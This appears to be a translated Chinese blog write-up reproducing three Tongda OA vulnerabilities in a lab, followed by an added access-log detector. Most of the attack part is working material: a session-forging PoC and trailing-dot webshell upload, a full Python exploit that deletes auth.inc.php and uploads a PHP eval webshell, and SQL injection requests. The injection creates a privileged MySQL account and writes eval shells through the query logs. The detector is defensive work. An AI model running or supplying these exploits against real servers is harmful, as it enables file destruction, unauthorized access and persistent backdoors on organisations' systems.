1. Lab environment
Target machine
- win7
- 192.168.73.129
Attacker machine
- win10
- 192.168.73.1
2. Vulnerability reproduction
2.1 Arbitrary user login and backend file upload getshell (V11.X < V11.5 / 2017)
Download Tongda OA version 2017 onto the target machine and install it with the default service configuration.
PoC download address: https://github.com/NS-Sp4ce/TongDaOA-Fake-User
Run python3 POC.py -v 2017 -url http://192.168.73.129/ to obtain a PHPSESSID, replace the browser's PHPSESSID with it in the developer tools (F12), then visit /general/index.php and you are logged in to the administrator account.
In the backend, click System Management -> Attachment Management -> Add Storage Directory (choose the root directory) -> Add.
Then click Organization -> System Administrator -> Attachments, as shown in the figure.
Uploading shell.php directly shows "file does not exist". Intercept the request and rename the file to "shell.php." (trailing dot): that filename violates Windows naming rules, so the system strips the final dot automatically, and after forwarding the request the response returns the path where the file was saved.
Behinder (冰蠍) connects successfully to http://192.168.73.129/im/2010/559350980.shell.php
2.2 Remote command execution (V11.6)
Installed with the default service configuration. The exploit written by another researcher is as follows:
import requests

# target IP
target = "http://192.168.73.129/"
# one-liner webshell, password "pass"
payload = "<?php eval($_POST['pass']);?>"

print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
# delete auth.inc.php from the site
url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url = target + "/inc/auth.inc.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to delete auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url, files=files)
url = target + "/_deconf.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]File uploaded successfully")
    print("[+]URL:", url)
else:
    print("[-]Failed to upload file")
The printed url is the location of the one-liner webshell; AntSword (蟻劍) connects successfully.
2.3 Backend SQL injection getshell (V11.7)
Installed with the default service configuration. Start the MySQL service in the Tongda application service control center (the default port is 3336). Exploiting this vulnerability requires an account and password to log in to the backend. The condition_cascade parameter of /general/hr/manage/query/delete_cascade.php is vulnerable to boolean-based blind injection:
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((1=1),1,power(9999,99))
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((1=2),1,power(9999,99))
Add the account at666 with password abcABC@123:
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
Connect to the database with Navicat. The newly added account cannot write files through the slow query log directly, so the created account needs additional privileges:
UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
Flush privileges through the injection point, because the current user does not have the privilege required to flush privileges itself:
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
Navicat reports that the password has expired, so the grant has to be executed again:
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
Writing the shell, method one:
select @@basedir; set global slow_query_log=on; set global slow_query_log_file='C:/MYOA/webroot/test.php'; select '<?php eval($_POST[x]);?>' or sleep(11);
Writing the shell, method two:
select @@basedir; set global general_log = on; set global general_log_file ='C:/MYOA/webroot/test2.php'; select '<?php eval($_POST[y]);?>'; show variables like '%general%';
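The three request patterns in 2.2 and 2.3 (the print.php file deletion, the traversal upload to upload.php and the SQL keywords in condition_cascade) all leave a trace in the web server access log. The detector below is an added example, not code from the original post or the referenced exploit; the log lines are constructed and the rule names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
192.168.73.1 - - [24/Oct/2020:10:01:02 +0800] "GET /general/index.php HTTP/1.1" 200 5120
192.168.73.1 - - [24/Oct/2020:10:02:10 +0800] "GET /module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php HTTP/1.1" 200 0
192.168.73.1 - - [24/Oct/2020:10:02:15 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./ HTTP/1.1" 200 35
192.168.73.1 - - [24/Oct/2020:10:03:00 +0800] "GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((1=1),1,power(9999,99)) HTTP/1.1" 200 12
192.168.73.1 - - [24/Oct/2020:10:03:30 +0800] "GET /general/hr/manage/query/delete_cascade.php?condition_cascade=flush%20privileges; HTTP/1.1" 200 12
192.168.73.1 - - [24/Oct/2020:10:04:00 +0800] "GET /general/hr/manage/query/delete_cascade.php?condition_cascade=1 HTTP/1.1" 200 12
"""

# Request line inside the quotes: method, target, protocol.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# SQL keywords that have no business in a cascade-delete condition.
SQL_RE = re.compile(r"\b(select|grant|flush|union|sleep|power|set\s+global)\b", re.I)


def classify(line):
    """Return the names of the rules that fire on one access-log line."""
    m = REQ_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %20 etc.
    hits = []
    if (path.endswith("/module/appbuilder/assets/print.php")
            and any("../" in g for g in qs.get("guid", []))):
        hits.append("print.php arbitrary file deletion (V11.6)")
    if (path.endswith("/general/data_center/utils/upload.php")
            and any("<>" in r or ".." in r for r in qs.get("repkid", []))):
        hits.append("upload.php path traversal upload (V11.6)")
    if (path.endswith("/general/hr/manage/query/delete_cascade.php")
            and any(SQL_RE.search(c) for c in qs.get("condition_cascade", []))):
        hits.append("delete_cascade.php SQL injection (V11.7)")
    return hits


def scan(log_text):
    """Return [(line_number, hits)] for every line on which a rule fired."""
    rows = [(n, classify(l)) for n, l in enumerate(log_text.splitlines(), 1)]
    return [(n, h) for n, h in rows if h]


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

The session forgery in 2.1 is not visible in the access log; it has to be caught on the application side (for example, an administrator session created without a matching login event).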
3. Summary
To prepare for the Programmers' Day competition I have not yet studied the root causes of these vulnerabilities; I only hurriedly collected a few reproductions that can getshell. If anything is wrong, criticism and corrections from the masters are welcome (Master Li, Master Fan and Master Liu are right beside me, concentrating on their postgraduate entrance exam review; I am quietly leaving an Easter egg here: as the weakest member of the Gulu Lingbo team and the most enthusiastic one at meals, I hope the three masters get rounder and rounder hhh).